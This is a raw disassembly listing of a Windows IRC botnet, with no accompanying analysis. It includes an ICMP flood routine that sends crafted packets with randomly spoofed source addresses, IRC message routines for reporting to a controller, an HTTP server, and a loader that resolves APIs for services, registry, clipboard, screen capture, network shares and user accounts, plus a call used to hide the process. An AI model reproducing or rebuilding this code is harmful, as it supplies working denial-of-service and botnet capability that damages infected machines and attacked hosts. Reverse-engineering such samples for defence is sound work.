loc_4040AE: ; CODE XREF: sub_403E06+292�j
xor eax, eax
mov ecx, 400h
lea edi, [ebp+var_18F0]
rep stosd
or esi, 0FFFFFFFFh
loc_4040C0: ; CODE XREF: sub_403E06+227�j
lea eax, [ebp+var_28F0]
inc ebx
inc esi
lea ecx, [eax+1]
loc_4040CB: ; CODE XREF: sub_403E06+2CA�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4040CB
sub eax, ecx
cmp ebx, eax
jb loc_40401D
jmp loc_404195
; ---------------------------------------------------------------------------
loc_4040E1: ; CODE XREF: sub_403E06+2A6�j
mov ecx, [ebp+var_128]
xor eax, eax
test ecx, ecx
jbe short loc_404120
loc_4040ED: ; CODE XREF: sub_403E06+2F6�j
mov edx, [ebp+eax*4+var_124]
cmp edx, [ebp+arg_0]
jz short loc_404115
inc eax
cmp eax, ecx
jb short loc_4040ED
jmp short loc_404120
; ---------------------------------------------------------------------------
loc_404100: ; CODE XREF: sub_403E06+312�j
mov ecx, [ebp+eax*4+var_120]
mov [ebp+eax*4+var_124], ecx
mov ecx, [ebp+var_128]
inc eax
loc_404115: ; CODE XREF: sub_403E06+2F1�j
dec ecx
cmp eax, ecx
jb short loc_404100
dec [ebp+var_128]
loc_404120: ; CODE XREF: sub_403E06+2E5�j
; sub_403E06+2F8�j
lea eax, [ebp+var_340]
lea edx, [eax+1]
loc_404129: ; CODE XREF: sub_403E06+328�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_404129
sub eax, edx
mov esi, eax
lea eax, [ebp+var_464]
lea ecx, [eax+1]
loc_40413D: ; CODE XREF: sub_403E06+33C�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40413D
sub eax, ecx
add eax, esi
cmp eax, 104h
jnb short loc_40418C
and [ebp+var_C], 0
lea eax, [ebp+var_C]
push eax
push 8004667Eh
push [ebp+arg_0]
call dword_433444
push [ebp+var_358]
lea eax, [ebp+var_340]
push [ebp+var_34C]
push eax
lea eax, [ebp+var_464]
push eax
push [ebp+arg_0]
call sub_403B4C
add esp, 14h
jmp short loc_404195
; ---------------------------------------------------------------------------
loc_40418C: ; CODE XREF: sub_403E06+347�j
push [ebp+arg_0]
call dword_4335AC
loc_404195: ; CODE XREF: sub_403E06+211�j
; sub_403E06+2D6�j ...
mov ebx, [ebp+var_8]
loc_404198: ; CODE XREF: sub_403E06+FA�j
; sub_403E06+120�j ...
mov esi, [ebp+arg_0]
inc esi
cmp esi, [ebp+var_4]
mov [ebp+arg_0], esi
jbe loc_403EF0
push 41h
xor eax, eax
pop ecx
push eax
push eax
push eax
lea eax, [ebp+var_23C]
push eax
mov eax, [ebp+var_4]
inc eax
loc_4041BB: ; CODE XREF: sub_403E06+E0�j
lea esi, [ebp+var_128]
lea edi, [ebp+var_23C]
push eax
rep movsd
call dword_433544
cmp eax, 0FFFFFFFFh
jnz loc_403EEB
loc_4041D9: ; CODE XREF: sub_403E06+66�j
; sub_403E06+8D�j ...
call dword_433558
push eax
lea eax, [ebp+var_8F0]
push offset aHttpdErrorServ ; "[HTTPD]: Error: server failed, returned"...
push eax
call sub_412BB5
xor esi, esi
add esp, 0Ch
cmp [ebp+var_350], esi
jnz short loc_404221
push esi
push [ebp+var_354]
lea eax, [ebp+var_8F0]
push eax
lea eax, [ebp+var_6EC]
push eax
push [ebp+var_6F0]
call sub_4045DD
add esp, 14h
loc_404221: ; CODE XREF: sub_403E06+3F6�j
lea eax, [ebp+var_8F0]
push eax
call sub_401C33
pop ecx
push ebx
call dword_4335AC
push [ebp+var_358]
call sub_4111AE
pop ecx
push esi
call ds:dword_41F014
int 3 ; Trap to Debugger
sub_403E06 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_404249 proc near ; DATA XREF: sub_4078FA+2A62�o
var_3BC = byte ptr -3BCh
var_1BC = dword ptr -1BCh
var_1B8 = byte ptr -1B8h
var_138 = byte ptr -138h
var_B8 = byte ptr -0B8h
var_38 = dword ptr -38h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 3BCh
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 68h
pop ecx
mov esi, eax
lea edi, [ebp+var_1BC]
rep movsd
push 0FFh
xor esi, esi
push 3
inc esi
push 2
mov [eax+19Ch], esi
call dword_4334A0
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jnz short loc_4042B0
call dword_433558
push eax
lea eax, [ebp+var_3BC]
push offset aIcmpErrorSocke ; "[ICMP]: Error: socket() failed, returne"...
push eax
call sub_412BB5
add esp, 0Ch
xor esi, esi
loc_4042A2: ; CODE XREF: sub_404249+9C�j
; sub_404249+C3�j
cmp [ebp+var_24], esi
jnz loc_404504
jmp loc_4044E4
; ---------------------------------------------------------------------------
loc_4042B0: ; CODE XREF: sub_404249+3A�j
push 4
lea ecx, [ebp+var_C]
push ecx
mov [ebp+var_C], esi
push 2
xor esi, esi
push esi
push eax
call dword_4334BC
cmp eax, 0FFFFFFFFh
jnz short loc_4042E7
call dword_433558
push eax
lea eax, [ebp+var_3BC]
push offset aIcmpErrorSetso ; "[ICMP]: Error: setsockopt() failed, ret"...
push eax
call sub_412BB5
add esp, 0Ch
jmp short loc_4042A2
; ---------------------------------------------------------------------------
loc_4042E7: ; CODE XREF: sub_404249+7F�j
lea eax, [ebp+var_1B8]
push eax
call dword_433514
cmp eax, 0FFFFFFFFh
jnz short loc_40430E
lea eax, [ebp+var_3BC]
push offset aIcmpInvalidTar ; "[ICMP]: Invalid target IP."
push eax
call sub_412BB5
pop ecx
pop ecx
jmp short loc_4042A2
; ---------------------------------------------------------------------------
loc_40430E: ; CODE XREF: sub_404249+AE�j
xor eax, eax
lea edi, [ebp+var_1C]
stosd
stosd
stosd
stosd
push esi
mov [ebp+var_1C], 2
call dword_4335EC
mov [ebp+var_1A], ax
lea eax, [ebp+var_1B8]
push eax
call dword_433514
mov ebx, ds:dword_41F004
mov [ebp+var_18], eax
mov [ebp+arg_0], esi
call ebx
mov [ebp+var_8], eax
call ebx
sub eax, [ebp+var_8]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp+var_30]
ja loc_40449C
mov esi, 100h
loc_404362: ; CODE XREF: sub_404249+24B�j
push 41Ch
mov byte_432FF8, 45h
call dword_4335EC
mov word_432FFA, ax
xor eax, eax
cmp [ebp+var_2C], eax
mov word_432FFC, 1
mov word_432FFE, ax
mov byte_433000, 80h
mov byte_433001, 1
mov word_433002, ax
jz short loc_4043D1
call sub_412D71
mov edi, eax
shl edi, 8
call sub_412D71
add edi, eax
shl edi, 8
call sub_412D71
add edi, eax
shl edi, 8
call sub_412D71
add edi, eax
mov dword_433004, edi
jmp short loc_4043E9
; ---------------------------------------------------------------------------
loc_4043D1: ; CODE XREF: sub_404249+159�j
push [ebp+var_1BC]
call sub_406C33
pop ecx
push eax
call dword_433514
mov dword_433004, eax
loc_4043E9: ; CODE XREF: sub_404249+186�j
mov eax, [ebp+var_18]
mov dword_433008, eax
call sub_412D71
cdq
mov ecx, esi
idiv ecx
mov byte_43300C, dl
call sub_412D71
cdq
mov ecx, esi
idiv ecx
mov byte_43300D, dl
call sub_412D71
cdq
mov ecx, 0F0h
idiv ecx
and word_43300E, 0
mov word_433012, 1
inc edx
mov word_433010, dx
call sub_412D71
cdq
mov ecx, 0FFh
idiv ecx
push 10h
mov edi, offset dword_433014
mov al, dl
mov cl, al
mov ch, cl
mov eax, ecx
shl eax, 10h
mov ax, cx
mov ecx, esi
rep stosd
lea eax, [ebp+var_1C]
push eax
xor edi, edi
push edi
push 41Ch
push offset byte_432FF8
push [ebp+var_4]
call dword_433470
cmp eax, 0FFFFFFFFh
jz loc_404521
inc [ebp+arg_0]
call ebx
sub eax, [ebp+var_8]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp+var_30]
jbe loc_404362
xor esi, esi
loc_40449C: ; CODE XREF: sub_404249+10E�j
push [ebp+var_4]
call dword_4335AC
mov eax, [ebp+arg_0]
imul eax, 3Ch
mov ecx, eax
shr eax, 0Ah
xor edx, edx
div [ebp+var_30]
shr ecx, 14h
push ecx
push eax
push [ebp+arg_0]
lea eax, [ebp+var_1B8]
push eax
lea eax, [ebp+var_138]
push eax
lea eax, [ebp+var_3BC]
push offset aIcmpDoneWithSF ; "[ICMP]: Done with %s flood to IP: %s. S"...
push eax
call sub_412BB5
add esp, 1Ch
cmp [ebp+var_24], esi
jnz short loc_404504
loc_4044E4: ; CODE XREF: sub_404249+62�j
push esi
push [ebp+var_28]
lea eax, [ebp+var_3BC]
push eax
lea eax, [ebp+var_B8]
push eax
push [ebp+var_1BC]
call sub_4045DD
add esp, 14h
loc_404504: ; CODE XREF: sub_404249+5C�j
; sub_404249+299�j
lea eax, [ebp+var_3BC]
push eax
call sub_401C33
push [ebp+var_38]
call sub_4111AE
pop ecx
pop ecx
push esi
loc_40451B: ; CODE XREF: sub_404249+347�j
call ds:dword_41F014
loc_404521: ; CODE XREF: sub_404249+231�j
push [ebp+var_4]
call dword_4335AC
call dword_433558
push eax
push [ebp+arg_0]
lea eax, [ebp+var_1B8]
push eax
push offset aIcmpErrorSendi ; "[ICMP]: Error sending packets to IP: %s"...
lea eax, [ebp+var_3BC]
push 200h
push eax
call sub_412E0D
add esp, 18h
cmp [ebp+var_24], edi
jnz short loc_404579
push edi
push [ebp+var_28]
lea eax, [ebp+var_3BC]
push eax
lea eax, [ebp+var_B8]
push eax
push [ebp+var_1BC]
call sub_4045DD
add esp, 14h
loc_404579: ; CODE XREF: sub_404249+30E�j
lea eax, [ebp+var_3BC]
push eax
call sub_401C33
push [ebp+var_38]
call sub_4111AE
pop ecx
pop ecx
push edi
jmp short loc_40451B
sub_404249 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404592 proc near ; CODE XREF: sub_40751F+40�p
; sub_4078FA+1BB�p ...
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 200h
lea eax, [ebp+arg_8]
push eax
push [ebp+arg_4]
lea eax, [ebp+var_200]
push 200h
push eax
call sub_412E64
lea eax, [ebp+var_200]
add esp, 10h
lea edx, [eax+1]
loc_4045BF: ; CODE XREF: sub_404592+32�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4045BF
push 0
sub eax, edx
push eax
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call dword_433534
leave
retn
sub_404592 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4045DD proc near ; CODE XREF: sub_401000+B2�p
; sub_4010CA+61�p ...
var_400 = byte ptr -400h
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 400h
cmp [ebp+arg_C], 0
push esi
push edi
mov edi, offset aNotice ; "NOTICE"
jnz short loc_4045F8
mov edi, offset aPrivmsg ; "PRIVMSG"
loc_4045F8: ; CODE XREF: sub_4045DD+14�j
mov eax, edi
lea edx, [eax+1]
loc_4045FD: ; CODE XREF: sub_4045DD+25�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4045FD
sub eax, edx
mov esi, eax
mov eax, [ebp+arg_4]
lea ecx, [eax+1]
loc_40460E: ; CODE XREF: sub_4045DD+36�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40460E
push [ebp+arg_8]
sub eax, ecx
mov ecx, 1FAh
sub ecx, eax
push offset aS_1 ; "%s"
sub ecx, esi
push ecx
lea eax, [ebp+var_400]
push eax
call sub_412E0D
lea eax, [ebp+var_400]
push eax
push [ebp+arg_4]
lea eax, [ebp+var_200]
push edi
push offset aSSS ; "%s %s :%s\r\n"
push eax
call sub_412BB5
add esp, 24h
lea eax, [ebp+var_200]
pop edi
lea ecx, [eax+1]
pop esi
loc_40465F: ; CODE XREF: sub_4045DD+87�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40465F
push 0
sub eax, ecx
push eax
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call dword_433534
cmp [ebp+arg_10], 0
jz short locret_40468C
push 0FAh
call ds:dword_41F000
locret_40468C: ; CODE XREF: sub_4045DD+A2�j
leave
retn
sub_4045DD endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40468E proc near ; CODE XREF: sub_40D1EF+4B�p
push ebx
push ebp
mov ebp, ds:dword_41F078
push esi
push edi
push offset aKernel32_dll ; "kernel32.dll"
call ebp
mov esi, ds:dword_41F074
mov edi, eax
xor ebx, ebx
cmp edi, ebx
jz loc_4047AE
push offset aSeterrormode ; "SetErrorMode"
push edi
call esi
push offset aCreatetoolhelp ; "CreateToolhelp32Snapshot"
push edi
mov dword_433478, eax
call esi
push offset aProcess32first ; "Process32First"
push edi
mov dword_433490, eax
call esi
push offset aProcess32next ; "Process32Next"
push edi
mov dword_4334EC, eax
call esi
push offset aModule32first ; "Module32First"
push edi
mov dword_433450, eax
call esi
push offset aGetdiskfreespa ; "GetDiskFreeSpaceExA"
push edi
mov dword_4334B8, eax
call esi
push offset aGetlogicaldriv ; "GetLogicalDriveStringsA"
push edi
mov dword_43349C, eax
call esi
push offset aGetdrivetypea ; "GetDriveTypeA"
push edi
mov dword_43353C, eax
call esi
push offset aSearchpatha ; "SearchPathA"
push edi
mov dword_43342C, eax
call esi
push offset aQueryperforman ; "QueryPerformanceCounter"
push edi
mov dword_4334C0, eax
call esi
push offset aQueryperform_0 ; "QueryPerformanceFrequency"
push edi
mov dword_4334E4, eax
call esi
cmp dword_433478, ebx
mov dword_433548, eax
jz short loc_40478C
cmp dword_433490, ebx
jz short loc_40478C
cmp dword_4334EC, ebx
jz short loc_40478C
cmp dword_433450, ebx
jz short loc_40478C
cmp dword_43349C, ebx
jz short loc_40478C
cmp dword_43353C, ebx
jz short loc_40478C
cmp dword_43342C, ebx
jz short loc_40478C
cmp dword_4334C0, ebx
jz short loc_40478C
cmp dword_4334E4, ebx
jz short loc_40478C
cmp eax, ebx
jnz short loc_404796
loc_40478C: ; CODE XREF: sub_40468E+B8�j
; sub_40468E+C0�j ...
mov dword_4335F0, 1
loc_404796: ; CODE XREF: sub_40468E+FC�j
push offset aRegisterservic ; "RegisterServiceProcess"
push edi
call esi
cmp eax, ebx
mov dword_43359C, eax
jz short loc_4047C3
push 1
push ebx
call eax
jmp short loc_4047C3
; ---------------------------------------------------------------------------
loc_4047AE: ; CODE XREF: sub_40468E+1D�j
call ds:dword_41F008
mov dword_4335F4, eax
mov dword_4335F0, 1
loc_4047C3: ; CODE XREF: sub_40468E+117�j
; sub_40468E+11E�j
push offset aUser32_dll ; "user32.dll"
call ds:dword_41F070
mov edi, eax
cmp edi, ebx
jz loc_40487E
push offset aSendmessagea ; "SendMessageA"
push edi
call esi
push offset aFindwindowa ; "FindWindowA"
push edi
mov dword_433560, eax
call esi
push offset aIswindow ; "IsWindow"
push edi
mov dword_4334F8, eax
call esi
push offset aDestroywindow ; "DestroyWindow"
push edi
mov dword_433434, eax
call esi
push offset aOpenclipboard ; "OpenClipboard"
push edi
mov dword_433498, eax
call esi
push offset aGetclipboardda ; "GetClipboardData"
push edi
mov dword_43344C, eax
call esi
push offset aCloseclipboard ; "CloseClipboard"
push edi
mov dword_4335CC, eax
call esi
push offset aExitwindowsex ; "ExitWindowsEx"
push edi
mov dword_433430, eax
call esi
cmp dword_433560, ebx
mov dword_433538, eax
jz short loc_404889
cmp dword_4334F8, ebx
jz short loc_404889
cmp dword_433434, ebx
jz short loc_404889
cmp dword_433498, ebx
jz short loc_404889
cmp dword_43344C, ebx
jz short loc_404889
cmp dword_4335CC, ebx
jz short loc_404889
cmp dword_433430, ebx
jz short loc_404889
cmp eax, ebx
jnz short loc_404893
jmp short loc_404889
; ---------------------------------------------------------------------------
loc_40487E: ; CODE XREF: sub_40468E+144�j
call ds:dword_41F008
mov dword_4335FC, eax
loc_404889: ; CODE XREF: sub_40468E+1B8�j
; sub_40468E+1C0�j ...
mov dword_4335F8, 1
loc_404893: ; CODE XREF: sub_40468E+1EC�j
push offset aAdvapi32_dll ; "advapi32.dll"
call ebp
mov edi, eax
cmp edi, ebx
jz loc_404A2E
push offset aRegopenkeyexa ; "RegOpenKeyExA"
push edi
call esi
push offset aRegcreatekeyex ; "RegCreateKeyExA"
push edi
mov dword_4335C8, eax
call esi
push offset aRegsetvalueexa ; "RegSetValueExA"
push edi
mov dword_4334E8, eax
call esi
push offset aRegqueryvaluee ; "RegQueryValueExA"
push edi
mov dword_433484, eax
call esi
push offset aRegdeletevalue ; "RegDeleteValueA"
push edi
mov dword_433460, eax
call esi
push offset aRegclosekey ; "RegCloseKey"
push edi
mov dword_4334DC, eax
call esi
cmp dword_4335C8, ebx
mov dword_43357C, eax
jz short loc_40491E
cmp dword_4334E8, ebx
jz short loc_40491E
cmp dword_433484, ebx
jz short loc_40491E
cmp dword_433460, ebx
jz short loc_40491E
cmp dword_4334DC, ebx
jz short loc_40491E
cmp eax, ebx
jnz short loc_404928
loc_40491E: ; CODE XREF: sub_40468E+26A�j
; sub_40468E+272�j ...
mov dword_433600, 1
loc_404928: ; CODE XREF: sub_40468E+28E�j
push offset aOpenprocesstok ; "OpenProcessToken"
push edi
call esi
push offset aLookupprivileg ; "LookupPrivilegeValueA"
push edi
mov dword_4335D4, eax
call esi
push offset aAdjusttokenpri ; "AdjustTokenPrivileges"
push edi
mov dword_4335BC, eax
call esi
cmp dword_4335D4, ebx
mov dword_433508, eax
jz short loc_404963
cmp dword_4335BC, ebx
jz short loc_404963
cmp eax, ebx
jnz short loc_40496D
loc_404963: ; CODE XREF: sub_40468E+2C7�j
; sub_40468E+2CF�j
mov dword_433600, 1
loc_40496D: ; CODE XREF: sub_40468E+2D3�j
push offset aOpenscmanagera ; "OpenSCManagerA"
push edi
call esi
push offset aOpenservicea ; "OpenServiceA"
push edi
mov dword_43355C, eax
call esi
push offset aStartservicea ; "StartServiceA"
push edi
mov dword_4335D8, eax
call esi
push offset aControlservice ; "ControlService"
push edi
mov dword_433564, eax
call esi
push offset aDeleteservice ; "DeleteService"
push edi
mov dword_433580, eax
call esi
push offset aCloseserviceha ; "CloseServiceHandle"
push edi
mov dword_433494, eax
call esi
push offset aEnumservicesst ; "EnumServicesStatusA"
push edi
mov dword_4334D0, eax
call esi
push offset aIsvalidsecurit ; "IsValidSecurityDescriptor"
push edi
mov dword_43356C, eax
call esi
cmp dword_43355C, ebx
mov dword_433598, eax
jz short loc_404A11
cmp dword_4335D8, ebx
jz short loc_404A11
cmp dword_433564, ebx
jz short loc_404A11
cmp dword_433580, ebx
jz short loc_404A11
cmp dword_433494, ebx
jz short loc_404A11
cmp dword_4334D0, ebx
jz short loc_404A11
cmp dword_43356C, ebx
jz short loc_404A11
cmp eax, ebx
jnz short loc_404A1B
loc_404A11: ; CODE XREF: sub_40468E+34D�j
; sub_40468E+355�j ...
mov dword_433600, 1
loc_404A1B: ; CODE XREF: sub_40468E+381�j
push offset aGetusernamea ; "GetUserNameA"
push edi
call esi
cmp eax, ebx
mov dword_433530, eax
jnz short loc_404A43
jmp short loc_404A39
; ---------------------------------------------------------------------------
loc_404A2E: ; CODE XREF: sub_40468E+210�j
call ds:dword_41F008
mov dword_433604, eax
loc_404A39: ; CODE XREF: sub_40468E+39E�j
mov dword_433600, 1
loc_404A43: ; CODE XREF: sub_40468E+39C�j
push offset aGdi32_dll ; "gdi32.dll"
call ebp
mov edi, eax
cmp edi, ebx
jz loc_404B0F
push offset aCreatedca ; "CreateDCA"
push edi
call esi
push offset aCreatedibsecti ; "CreateDIBSection"
push edi
mov dword_4335DC, eax
call esi
push offset aCreatecompatib ; "CreateCompatibleDC"
push edi
mov dword_4335B0, eax
call esi
push offset aGetdevicecaps ; "GetDeviceCaps"
push edi
mov dword_433518, eax
call esi
push offset aGetdibcolortab ; "GetDIBColorTable"
push edi
mov dword_433510, eax
call esi
push offset aSelectobject ; "SelectObject"
push edi
mov dword_433554, eax
call esi
push offset aBitblt ; "BitBlt"
push edi
mov dword_43343C, eax
call esi
push offset aDeletedc ; "DeleteDC"
push edi
mov dword_433528, eax
call esi
push offset aDeleteobject ; "DeleteObject"
push edi
mov dword_4334CC, eax
call esi
cmp dword_4335DC, ebx
mov dword_43351C, eax
jz short loc_404B1A
cmp dword_4335B0, ebx
jz short loc_404B1A
cmp dword_433518, ebx
jz short loc_404B1A
cmp dword_433510, ebx
jz short loc_404B1A
cmp dword_433554, ebx
jz short loc_404B1A
cmp dword_43343C, ebx
jz short loc_404B1A
cmp dword_433528, ebx
jz short loc_404B1A
cmp dword_4334CC, ebx
jz short loc_404B1A
cmp eax, ebx
jnz short loc_404B24
jmp short loc_404B1A
; ---------------------------------------------------------------------------
loc_404B0F: ; CODE XREF: sub_40468E+3C0�j
call ds:dword_41F008
mov dword_43360C, eax
loc_404B1A: ; CODE XREF: sub_40468E+441�j
; sub_40468E+449�j ...
mov dword_433608, 1
loc_404B24: ; CODE XREF: sub_40468E+47D�j
mov ebp, ds:dword_41F070
push offset aWs2_32_dll ; "ws2_32.dll"
call ebp
mov edi, eax
cmp edi, ebx
jz loc_404DE0
push offset aWsastartup ; "WSAStartup"
push edi
call esi
push offset aWsasocketa ; "WSASocketA"
push edi
mov dword_4334B0, eax
call esi
push offset aWsaasyncselect ; "WSAAsyncSelect"
push edi
mov dword_433424, eax
call esi
push offset a__wsafdisset ; "__WSAFDIsSet"
push edi
mov dword_43352C, eax
call esi
push offset aWsaioctl ; "WSAIoctl"
push edi
mov dword_4334F4, eax
call esi
push offset aWsagetlasterro ; "WSAGetLastError"
push edi
mov dword_433574, eax
call esi
push offset aWsacleanup ; "WSACleanup"
push edi
mov dword_433558, eax
call esi
push offset aSocket ; "socket"
push edi
mov dword_4335B8, eax
call esi
push offset aIoctlsocket ; "ioctlsocket"
push edi
mov dword_4334A0, eax
call esi
push offset aConnect ; "connect"
push edi
mov dword_433444, eax
call esi
push offset aInet_ntoa ; "inet_ntoa"
push edi
mov dword_433458, eax
call esi
push offset aInet_addr ; "inet_addr"
push edi
mov dword_433520, eax
call esi
push offset aHtons ; "htons"
push edi
mov dword_433514, eax
call esi
push offset aHtonl ; "htonl"
push edi
mov dword_4335EC, eax
call esi
push offset aNtohs ; "ntohs"
push edi
mov dword_4335C4, eax
call esi
push offset aNtohl ; "ntohl"
push edi
mov dword_433594, eax
call esi
push offset aSend ; "send"
push edi
mov dword_433570, eax
call esi
push offset aSendto ; "sendto"
push edi
mov dword_433534, eax
call esi
push offset aRecv ; "recv"
push edi
mov dword_433470, eax
call esi
push offset aRecvfrom ; "recvfrom"
push edi
mov dword_433414, eax
call esi
mov dword_433438, eax
push offset aBind ; "bind"
push edi
call esi
push offset aSelect ; "select"
push edi
mov dword_433578, eax
call esi
push offset aListen ; "listen"
push edi
mov dword_433544, eax
call esi
push offset aAccept ; "accept"
push edi
mov dword_4335C0, eax
call esi
push offset aSetsockopt ; "setsockopt"
push edi
mov dword_433464, eax
call esi
push offset aGetsockname ; "getsockname"
push edi
mov dword_4334BC, eax
call esi
push offset aGethostname ; "gethostname"
push edi
mov dword_433418, eax
call esi
push offset aGethostbyname ; "gethostbyname"
push edi
mov dword_4335B4, eax
call esi
push offset aGethostbyaddr ; "gethostbyaddr"
push edi
mov dword_433500, eax
call esi
push offset aGetpeername ; "getpeername"
push edi
mov dword_433590, eax
call esi
push offset aClosesocket ; "closesocket"
push edi
mov dword_4334E0, eax
call esi
cmp dword_4334B0, ebx
mov dword_4335AC, eax
jz loc_404DEB
cmp dword_433424, ebx
jz loc_404DEB
cmp dword_43352C, ebx
jz loc_404DEB
cmp dword_433574, ebx
jz loc_404DEB
cmp dword_433558, ebx
jz loc_404DEB
cmp dword_4335B8, ebx
jz loc_404DEB
cmp dword_4334A0, ebx
jz loc_404DEB
cmp dword_433444, ebx
jz loc_404DEB
cmp dword_433458, ebx
jz loc_404DEB
cmp dword_433520, ebx
jz loc_404DEB
cmp dword_433514, ebx
jz loc_404DEB
cmp dword_4335EC, ebx
jz loc_404DEB
cmp dword_4335C4, ebx
jz loc_404DEB
cmp dword_433594, ebx
jz short loc_404DEB
cmp dword_433534, ebx
jz short loc_404DEB
cmp dword_433470, ebx
jz short loc_404DEB
cmp dword_433414, ebx
jz short loc_404DEB
cmp dword_433438, ebx
jz short loc_404DEB
cmp dword_433578, ebx
jz short loc_404DEB
cmp dword_433544, ebx
jz short loc_404DEB
cmp dword_4335C0, ebx
jz short loc_404DEB
cmp dword_433464, ebx
jz short loc_404DEB
cmp dword_4334BC, ebx
jz short loc_404DEB
cmp dword_433418, ebx
jz short loc_404DEB
cmp dword_4335B4, ebx
jz short loc_404DEB
cmp dword_433500, ebx
jz short loc_404DEB
cmp dword_433590, ebx
jz short loc_404DEB
cmp eax, ebx
jnz short loc_404DF5
jmp short loc_404DEB
; ---------------------------------------------------------------------------
loc_404DE0: ; CODE XREF: sub_40468E+4A7�j
call ds:dword_41F008
mov dword_433614, eax
loc_404DEB: ; CODE XREF: sub_40468E+646�j
; sub_40468E+652�j ...
mov dword_433610, 1
loc_404DF5: ; CODE XREF: sub_40468E+74E�j
push offset aWininet_dll ; "wininet.dll"
call ebp
mov edi, eax
cmp edi, ebx
jz loc_404EFA
push offset aInternetgetcon ; "InternetGetConnectedState"
push edi
call esi
push offset aInternetgetc_0 ; "InternetGetConnectedStateEx"
push edi
mov dword_433428, eax
call esi
push offset aHttpopenreques ; "HttpOpenRequestA"
push edi
mov dword_4335E8, eax
call esi
push offset aHttpsendreques ; "HttpSendRequestA"
push edi
mov dword_4334C8, eax
call esi
push offset aInternetconnec ; "InternetConnectA"
push edi
mov dword_4335E4, eax
call esi
push offset aInternetopena ; "InternetOpenA"
push edi
mov dword_4334D4, eax
call esi
push offset aInternetopenur ; "InternetOpenUrlA"
push edi
mov dword_433448, eax
call esi
push offset aInternetcracku ; "InternetCrackUrlA"
push edi
mov dword_4334A8, eax
call esi
push offset aInternetreadfi ; "InternetReadFile"
push edi
mov dword_433420, eax
call esi
push offset aInternetcloseh ; "InternetCloseHandle"
push edi
mov dword_43354C, eax
call esi
cmp dword_433428, ebx
mov ecx, dword_433448
mov dword_4334FC, eax
jz short loc_404ED6
cmp dword_4335E8, ebx
jz short loc_404ED6
cmp dword_4334C8, ebx
jz short loc_404ED6
cmp dword_4335E4, ebx
jz short loc_404ED6
cmp dword_4334D4, ebx
jz short loc_404ED6
cmp ecx, ebx
jz short loc_404ED6
cmp dword_4334A8, ebx
jz short loc_404ED6
cmp dword_433420, ebx
jz short loc_404ED6
cmp dword_43354C, ebx
jz short loc_404ED6
cmp eax, ebx
jnz short loc_404EE0
loc_404ED6: ; CODE XREF: sub_40468E+806�j
; sub_40468E+80E�j ...
mov dword_433618, 1
loc_404EE0: ; CODE XREF: sub_40468E+846�j
cmp ecx, ebx
jz short loc_404F15
push ebx
push ebx
push ebx
push ebx
push offset aMozilla4_0Comp ; "Mozilla/4.0 (compatible)"
call ecx
cmp eax, ebx
mov dword_4335E0, eax
jnz short loc_404F15
jmp short loc_404F0F
; ---------------------------------------------------------------------------
loc_404EFA: ; CODE XREF: sub_40468E+772�j
call ds:dword_41F008
mov dword_43361C, eax
mov dword_433618, 1
loc_404F0F: ; CODE XREF: sub_40468E+86A�j
mov dword_4335E0, ebx
loc_404F15: ; CODE XREF: sub_40468E+854�j
; sub_40468E+868�j
push offset aIcmp_dll ; "icmp.dll"
call ebp
mov edi, eax
cmp edi, ebx
jz short loc_404F5F
push offset aIcmpcreatefile ; "IcmpCreateFile"
push edi
call esi
push offset aIcmpclosehandl ; "IcmpCloseHandle"
push edi
mov dword_4334F0, eax
call esi
push offset aIcmpsendecho ; "IcmpSendEcho"
push edi
mov dword_433524, eax
call esi
cmp dword_4334F0, ebx
mov dword_433588, eax
jz short loc_404F6A
cmp dword_433524, ebx
jz short loc_404F6A
cmp eax, ebx
jnz short loc_404F74
jmp short loc_404F6A
; ---------------------------------------------------------------------------
loc_404F5F: ; CODE XREF: sub_40468E+892�j
call ds:dword_41F008
mov dword_433624, eax
loc_404F6A: ; CODE XREF: sub_40468E+8C1�j
; sub_40468E+8C9�j ...
mov dword_433620, 1
loc_404F74: ; CODE XREF: sub_40468E+8CD�j
push offset aNetapi32_dll ; "netapi32.dll"
call ebp
mov edi, eax
cmp edi, ebx
jz loc_40506A
push offset aNetshareadd ; "NetShareAdd"
push edi
call esi
push offset aNetsharedel ; "NetShareDel"
push edi
mov dword_433488, eax
call esi
push offset aNetshareenum ; "NetShareEnum"
push edi
mov dword_4334A4, eax
call esi
push offset aNetschedulejob ; "NetScheduleJobAdd"
push edi
mov dword_4335A0, eax
call esi
push offset aNetapibufferfr ; "NetApiBufferFree"
push edi
mov dword_433454, eax
call esi
push offset aNetremotetod ; "NetRemoteTOD"
push edi
mov dword_4334D8, eax
call esi
push offset aNetuseradd ; "NetUserAdd"
push edi
mov dword_43341C, eax
call esi
push offset aNetuserdel ; "NetUserDel"
push edi
mov dword_43346C, eax
call esi
push offset aNetuserenum ; "NetUserEnum"
push edi
mov dword_433568, eax
call esi
push offset aNetusergetinfo ; "NetUserGetInfo"
push edi
mov dword_433480, eax
call esi
push offset aNetmessagebuff ; "NetMessageBufferSend"
push edi
mov dword_43348C, eax
